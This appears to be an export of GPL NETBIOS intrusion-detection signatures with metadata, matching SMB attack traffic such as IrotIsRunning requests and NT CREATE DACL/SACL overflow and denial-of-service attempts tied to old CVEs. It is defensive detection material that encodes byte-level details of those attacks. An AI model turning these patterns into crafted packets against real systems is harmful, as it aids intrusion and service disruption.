alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB ISystemActivator unicode little endian andx bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|A0 01 00 00 00 00 00 00 C0 00 00 00 00 00 00|F"; within:16; distance:29; flowbits:set,dce.isystemactivator.bind; flowbits:noalert; classtype:protocol-command-decode; sid:2103400; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB ISystemActivator unicode little endian andx bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103260

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB IrotIsRunning andx attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.irot; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 02|"; within:2; distance:19; byte_jump:4,8,relative,little,align; byte_test:4,>,1024,0,little; reference:bugtraq,6005; reference:cve,2002-1561; reference:url,www.microsoft.com/technet/security/bulletin/MS03-010.mspx; classtype:protocol-command-decode; sid:2103260; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB IrotIsRunning andx attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : bugtraq,6005|cve,2002-1561|url,www.microsoft.com/technet/security/bulletin/MS03-010.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103261

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB IrotIsRunning little endian andx attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.irot; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|02 00|"; within:2; distance:19; byte_jump:4,8,relative,little,align; byte_test:4,>,1024,0,little; reference:bugtraq,6005; reference:cve,2002-1561; reference:url,www.microsoft.com/technet/security/bulletin/MS03-010.mspx; classtype:protocol-command-decode; sid:2103261; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB IrotIsRunning little endian andx attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : bugtraq,6005|cve,2002-1561|url,www.microsoft.com/technet/security/bulletin/MS03-010.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103262

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB IrotIsRunning unicode andx attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.irot; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 02|"; within:2; distance:19; byte_jump:4,8,relative,little,align; byte_test:4,>,1024,0,little; reference:bugtraq,6005; reference:cve,2002-1561; reference:url,www.microsoft.com/technet/security/bulletin/MS03-010.mspx; classtype:protocol-command-decode; sid:2103262; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB IrotIsRunning unicode andx attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : bugtraq,6005|cve,2002-1561|url,www.microsoft.com/technet/security/bulletin/MS03-010.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103263

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB IrotIsRunning unicode little endian andx attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.irot; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|02 00|"; within:2; distance:19; byte_jump:4,8,relative,little,align; byte_test:4,>,1024,0,little; reference:bugtraq,6005; reference:cve,2002-1561; reference:url,www.microsoft.com/technet/security/bulletin/MS03-010.mspx; classtype:protocol-command-decode; sid:2103263; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB IrotIsRunning unicode little endian andx attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : bugtraq,6005|cve,2002-1561|url,www.microsoft.com/technet/security/bulletin/MS03-010.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103022

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS NT Trans NT CREATE oversized Security Descriptor attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB|A0|"; within:5; distance:3; byte_test:1,!&,128,6,relative; pcre:"/^.{27}/R"; content:"|01 00|"; within:2; distance:37; byte_jump:4,-15,little,relative,from_beginning; isdataat:4,relative; byte_test:4,>,1024,40,relative,little; reference:cve,2004-1154; classtype:protocol-command-decode; sid:2103022; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS NT Trans NT CREATE oversized Security Descriptor attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : cve,2004-1154

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103019

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB NT Trans NT CREATE andx oversized Security Descriptor attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,!&,128,6,relative; content:"|A0|"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"|01 00|"; within:2; distance:37; byte_jump:4,-15,little,relative,from_beginning; byte_test:4,>,1024,40,relative,little; reference:cve,2004-1154; classtype:protocol-command-decode; sid:2103019; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB NT Trans NT CREATE andx oversized Security Descriptor attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : cve,2004-1154

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103034

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB NT Trans NT CREATE DACL overflow attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB|A0|"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"|01 00|"; within:2; distance:64; byte_jump:4,-7,little,relative,from_beginning; content:!"|00 00 00 00|"; within:4; distance:20; byte_jump:4,20,relative,little; byte_test:4,>,32,-16,relative,little; reference:cve,2004-1154; classtype:protocol-command-decode; sid:2103034; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB NT Trans NT CREATE DACL overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : cve,2004-1154

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103026

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB NT Trans NT CREATE SACL overflow attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB|A0|"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"|01 00|"; within:2; distance:64; byte_jump:4,-7,little,relative,from_beginning; content:!"|00 00 00 00|"; within:4; distance:16; byte_jump:4,16,relative,little; byte_test:4,>,32,-16,relative,little; reference:cve,2004-1154; classtype:protocol-command-decode; sid:2103026; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB NT Trans NT CREATE SACL overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : cve,2004-1154

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103035

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB NT Trans NT CREATE andx DACL overflow attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,!&,128,6,relative; content:"|A0|"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"|01 00|"; within:2; distance:37; byte_jump:4,-7,little,relative,from_beginning; content:!"|00 00 00 00|"; within:4; distance:20; byte_jump:4,20,relative,little; byte_test:4,>,32,-16,relative,little; reference:cve,2004-1154; classtype:protocol-command-decode; sid:2103035; rev:9; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB NT Trans NT CREATE andx DACL overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : cve,2004-1154

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 9

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103027

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB NT Trans NT CREATE andx SACL overflow attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,!&,128,6,relative; content:"|A0|"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"|01 00|"; within:2; distance:37; byte_jump:4,-7,little,relative,from_beginning; content:!"|00 00 00 00|"; within:4; distance:16; byte_jump:4,16,relative,little; byte_test:4,>,32,-16,relative,little; reference:cve,2004-1154; classtype:protocol-command-decode; sid:2103027; rev:6; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB NT Trans NT CREATE andx SACL overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : cve,2004-1154

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 6

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103051

#alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB NT Trans NT CREATE andx invalid SACL ace size dos attempt"; flow:stateless; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,!&,128,6,relative; content:"|A0|"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"|01 00|"; within:2; distance:37; byte_jump:4,-7,little,relative,from_beginning; content:!"|00 00 00 00|"; within:4; distance:20; byte_jump:4,20,relative,little; content:"|00 00|"; within:2; distance:-10; classtype:protocol-command-decode; sid:2103051; rev:6; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB NT Trans NT CREATE andx invalid SACL ace size dos attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 6

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103042

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB NT Trans NT CREATE invalid SACL ace size dos attempt"; flow:stateless; content:"|00|"; depth:1; content:"|FF|SMB|A0|"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"|01 00|"; within:2; distance:64; byte_jump:4,-7,little,relative,from_beginning; content:!"|00 00 00 00|"; within:4; distance:16; byte_jump:4,16,relative,little; content:"|00 00|"; within:2; distance:-10; classtype:protocol-command-decode; sid:2103042; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB NT Trans NT CREATE invalid SACL ace size dos attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103050

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB NT Trans NT CREATE invalid SACL ace size dos attempt"; flow:stateless; content:"|00|"; depth:1; content:"|FF|SMB|A0|"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"|01 00|"; within:2; distance:64; byte_jump:4,-7,little,relative,from_beginning; content:!"|00 00 00 00|"; within:4; distance:20; byte_jump:4,20,relative,little; content:"|00 00|"; within:2; distance:-10; classtype:protocol-command-decode; sid:2103050; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB NT Trans NT CREATE invalid SACL ace size dos attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103036

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB NT Trans NT CREATE unicode DACL overflow attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB|A0|"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"|01 00|"; within:2; distance:64; byte_jump:4,-7,little,relative,from_beginning; content:!"|00 00 00 00|"; within:4; distance:20; byte_jump:4,20,relative,little; byte_test:4,>,32,-16,relative,little; reference:cve,2004-1154; classtype:protocol-command-decode; sid:2103036; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB NT Trans NT CREATE unicode DACL overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : cve,2004-1154

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103028

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB NT Trans NT CREATE unicode SACL overflow attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB|A0|"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"|01 00|"; within:2; distance:64; byte_jump:4,-7,little,relative,from_beginning; content:!"|00 00 00 00|"; within:4; distance:16; byte_jump:4,16,relative,little; byte_test:4,>,32,-16,relative,little; reference:cve,2004-1154; classtype:protocol-command-decode; sid:2103028; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB NT Trans NT CREATE unicode SACL overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : cve,2004-1154

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103037

#alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB NT Trans NT CREATE unicode andx DACL overflow attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,&,128,6,relative; content:"|A0|"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"|01 00|"; within:2; distance:37; byte_jump:4,-7,little,relative,from_beginning; content:!"|00 00 00 00|"; within:4; distance:20; byte_jump:4,20,relative,little; byte_test:4,>,32,-16,relative,little; reference:cve,2004-1154; classtype:protocol-command-decode; sid:2103037; rev:6; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB NT Trans NT CREATE unicode andx DACL overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : cve,2004-1154

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 6

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103029

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB NT Trans NT CREATE unicode andx SACL overflow attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,&,128,6,relative; content:"|A0|"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"|01 00|"; within:2; distance:37; byte_jump:4,-7,little,relative,from_beginning; content:!"|00 00 00 00|"; within:4; distance:16; byte_jump:4,16,relative,little; byte_test:4,>,32,-16,relative,little; reference:cve,2004-1154; classtype:protocol-command-decode; sid:2103029; rev:6; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB NT Trans NT CREATE unicode andx SACL overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : cve,2004-1154

CVE reference : CVE-2004-1154

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 6

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103045

#alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB NT Trans NT CREATE unicode andx invalid SACL ace size dos attempt"; flow:stateless; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,&,128,6,relative; content:"|A0|"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"|01 00|"; within:2; distance:37; byte_jump:4,-7,little,relative,from_beginning; isdataat:4,relative; content:!"|00 00 00 00|"; within:4; distance:16; byte_jump:4,16,relative,little; content:"|00 00|"; within:2; distance:-10; classtype:protocol-command-decode; sid:2103045; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB NT Trans NT CREATE unicode andx invalid SACL ace size dos attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103053

#alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB NT Trans NT CREATE unicode andx invalid SACL ace size dos attempt"; flow:stateless; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,&,128,6,relative; content:"|A0|"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"|01 00|"; within:2; distance:37; byte_jump:4,-7,little,relative,from_beginning; isdataat:4,relative; content:!"|00 00 00 00|"; within:4; distance:20; byte_jump:4,20,relative,little; content:"|00 00|"; within:2; distance:-10; classtype:protocol-command-decode; sid:2103053; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB NT Trans NT CREATE unicode andx invalid SACL ace size dos attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103044

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB NT Trans NT CREATE unicode invalid SACL ace size dos attempt"; flow:stateless; content:"|00|"; depth:1; content:"|FF|SMB|A0|"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"|01 00|"; within:2; distance:64; byte_jump:4,-7,little,relative,from_beginning; content:!"|00 00 00 00|"; within:4; distance:16; byte_jump:4,16,relative,little; content:"|00 00|"; within:2; distance:-10; classtype:protocol-command-decode; sid:2103044; rev:6; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB NT Trans NT CREATE unicode invalid SACL ace size dos attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 6

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103052

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB NT Trans NT CREATE unicode invalid SACL ace size dos attempt"; flow:stateless; content:"|00|"; depth:1; content:"|FF|SMB|A0|"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"|01 00|"; within:2; distance:64; byte_jump:4,-7,little,relative,from_beginning; content:!"|00 00 00 00|"; within:4; distance:20; byte_jump:4,20,relative,little; content:"|00 00|"; within:2; distance:-10; classtype:protocol-command-decode; sid:2103052; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB NT Trans NT CREATE unicode invalid SACL ace size dos attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103038

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS NT Trans NT CREATE DACL overflow attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB|A0|"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"|01 00|"; within:2; distance:64; byte_jump:4,-7,little,relative,from_beginning; content:!"|00 00 00 00|"; within:4; distance:20; byte_jump:4,20,relative,little; byte_test:4,>,32,-16,relative,little; reference:cve,2004-1154; classtype:protocol-command-decode; sid:2103038; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS NT Trans NT CREATE DACL overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : cve,2004-1154

CVE reference : CVE-2004-1154

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103030

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS NT Trans NT CREATE SACL overflow attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB|A0|"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"|01 00|"; within:2; distance:64; byte_jump:4,-7,little,relative,from_beginning; content:!"|00 00 00 00|"; within:4; distance:16; byte_jump:4,16,relative,little; byte_test:4,>,32,-16,relative,little; reference:cve,2004-1154; classtype:protocol-command-decode; sid:2103030; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS NT Trans NT CREATE SACL overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : cve,2004-1154

CVE reference : CVE-2004-1154

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103039

#alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS NT Trans NT CREATE andx DACL overflow attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,!&,128,6,relative; content:"|A0|"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"|01 00|"; within:2; distance:37; byte_jump:4,-7,little,relative,from_beginning; content:!"|00 00 00 00|"; within:4; distance:20; byte_jump:4,20,relative,little; byte_test:4,>,32,-16,relative,little; reference:cve,2004-1154; classtype:protocol-command-decode; sid:2103039; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS NT Trans NT CREATE andx DACL overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : cve,2004-1154

CVE reference : CVE-2004-1154

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103031

#alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS NT Trans NT CREATE andx SACL overflow attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,!&,128,6,relative; content:"|A0|"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"|01 00|"; within:2; distance:37; byte_jump:4,-7,little,relative,from_beginning; content:!"|00 00 00 00|"; within:4; distance:16; byte_jump:4,16,relative,little; byte_test:4,>,32,-16,relative,little; reference:cve,2004-1154; classtype:protocol-command-decode; sid:2103031; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS NT Trans NT CREATE andx SACL overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : cve,2004-1154

CVE reference : CVE-2004-1154

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

